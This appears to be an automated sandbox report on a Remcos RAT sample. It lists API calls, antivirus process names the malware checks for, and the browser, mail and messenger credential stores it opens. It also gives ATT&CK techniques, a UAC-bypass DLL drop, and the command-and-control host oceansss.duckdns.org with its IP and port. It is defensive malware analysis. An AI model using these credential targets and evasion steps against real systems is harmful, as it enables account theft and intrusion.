                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_156D2610
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: EnumSystemLocalesW,0_2_156D2036
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_156D20C3
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetLocaleInfoW,0_2_156D2313
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_156D1CD8
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: EnumSystemLocalesW,0_2_156D1F50
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: EnumSystemLocalesW,0_2_156D1F9B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetLocaleInfoW,0_2_156C88ED
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetLocaleInfoA,0_2_1568F8D1
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02DFD5D0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02DE5A90
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetLocaleInfoA,0_2_02DEA7CC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetLocaleInfoA,0_2_02DEA780
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02DE5B9C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02DFD5D0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02E05FA0
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: CoInitialize,EnumSystemLocalesA,6_2_02E0D5D0
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: EnumSystemLocalesA,6_2_02E15F9F
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: EnumSystemLocalesA,8_2_02D7D5D0
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: EnumSystemLocalesA,8_2_02D85F9F
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_14AE1CD8
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_14AE243C
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: EnumSystemLocalesW,8_2_14AD8404
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: GetLocaleInfoW,8_2_14AE2543
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_14AE2610
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: EnumSystemLocalesW,8_2_14AE1F9B
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: EnumSystemLocalesW,8_2_14AE1F50
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: GetLocaleInfoW,8_2_14AD88ED
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: EnumSystemLocalesW,8_2_14AE2036
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: GetLocaleInfoW,8_2_14AE230A
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: GetLocaleInfoW,8_2_14AE2313
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: GetLocaleInfoA,8_2_14A9F8D1
                      Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569B4EF GetLocalTime,0_2_1569B4EF
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569B60D GetComputerNameExW,GetUserNameW,0_2_1569B60D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156C9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_156C9190
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DEB748 GetVersionExA,0_2_02DEB748
                      Source: C:\ProgramData\Remcos\remcos.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: cmdagent.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: quhlpsvc.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgamsvr.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: TMBMSRV.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: Vsserv.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgupsvc.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgemc.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cmzcxhwn.PIF PID: 2700, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4692, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\fgdghrd\logs.dat, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_1568BA12
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_1568BB30
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: \key3.db0_2_1568BB30
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                      Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Instant Messenger accounts or passwords
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Yara detected WebBrowserPassView password recovery tool
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916Jump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFMutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
                      Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFMutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
                      Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cmzcxhwn.PIF PID: 2700, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4692, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\fgdghrd\logs.dat, type: DROPPED
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: cmd.exe0_2_1568569A

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		1
                      Valid Accounts                      		1
                      Native API                      		1
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter                      		1
                      DLL Side-Loading                      		1
                      Bypass User Account Control                      		2
                      Obfuscated Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts2
                      Service Execution                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Software Packing                      		1
                      Credentials in Registry                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      Windows Service                      		11
                      Access Token Manipulation                      		1
                      DLL Side-Loading                      		3
                      Credentials In Files                      		1
                      System Network Connections Discovery                      		Distributed Component Object Model211
                      Input Capture                      		1
                      Remote Access Software                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd21
                      Registry Run Keys / Startup Folder                      		1
                      Windows Service                      		1
                      Bypass User Account Control                      		LSA Secrets3
                      File and Directory Discovery                      		SSH3
                      Clipboard Data                      		2
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts122
                      Process Injection                      		11
                      Masquerading                      		Cached Domain Credentials47
                      System Information Discovery                      		VNCGUI Input Capture213
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
                      Registry Run Keys / Startup Folder                      		1
                      Valid Accounts                      		DCSync131
                      Security Software Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Virtualization/Sandbox Evasion                      		Proc Filesystem1
                      Virtualization/Sandbox Evasion                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Access Token Manipulation                      		/etc/passwd and /etc/shadow4
                      Process Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron122
                      Process Injection                      		Network Sniffing1
                      Application Window Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                      System Owner/User Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430790 Sample: fu56fbrtn8.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 51 oceansss.duckdns.org 2->51 53 web.fe.1drv.com 2->53 55 6 other IPs or domains 2->55 63 Snort IDS alert for network traffic 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 71 14 other signatures 2->71 8 fu56fbrtn8.exe 3 11 2->8         started        13 Cmzcxhwn.PIF 2->13         started        15 remcos.exe 2->15         started        17 3 other processes 2->17 signatures3 69 Uses dynamic DNS services 51->69 process4 dnsIp5 61 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49705, 49706 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->61 43 C:\Users\Public\Libraries\netutils.dll, PE32+ 8->43 dropped 45 C:\Users\Public\Libraries\easinvoker.exe, PE32+ 8->45 dropped 47 C:\ProgramData\Remcos\remcos.exe, PE32 8->47 dropped 49 2 other malicious files 8->49 dropped 83 Contains functionality to bypass UAC (CMSTPLUA) 8->83 85 Detected Remcos RAT 8->85 87 Detected unpacking (creates a PE file in dynamic memory) 8->87 95 6 other signatures 8->95 19 remcos.exe 3 18 8->19         started        24 extrac32.exe 1 8->24         started        26 cmd.exe 1 8->26         started        89 Multi AV Scanner detection for dropped file 13->89 91 Contains functionalty to change the wallpaper 13->91 93 Machine Learning detection for dropped file 13->93 file6 signatures7 process8 dnsIp9 57 oceansss.duckdns.org 103.186.117.142, 1144, 49711, 49712 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 19->57 59 geoplugin.net 178.237.33.50, 49714, 80 ATOM86-ASATOM86NL Netherlands 19->59 39 C:\ProgramData\fgdghrd\logs.dat, data 19->39 dropped 73 Multi AV Scanner detection for dropped file 19->73 75 Detected Remcos RAT 19->75 77 Machine Learning detection for dropped file 19->77 81 3 other signatures 19->81 28 remcos.exe 1 19->28         started        31 remcos.exe 19->31         started        33 remcos.exe 19->33         started        37 4 other processes 19->37 41 C:\Users\Public\Libraries\Cmzcxhwn.PIF, PE32 24->41 dropped 79 Drops PE files with a suspicious file extension 24->79 35 conhost.exe 26->35         started        file10 signatures11 process12 signatures13 97 Tries to steal Instant Messenger accounts or passwords 28->97 99 Tries to steal Mail credentials (via file / registry access) 28->99 101 Tries to harvest and steal browser information (history, passwords, etc) 33->101

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      fu56fbrtn8.exe71%ReversingLabsWin32.Backdoor.Remcos
                      fu56fbrtn8.exe73%VirustotalBrowse
                      fu56fbrtn8.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Libraries\netutils.dll100%AviraTR/AVI.Agent.rqsyc
                      C:\ProgramData\Remcos\remcos.exe100%Joe Sandbox ML
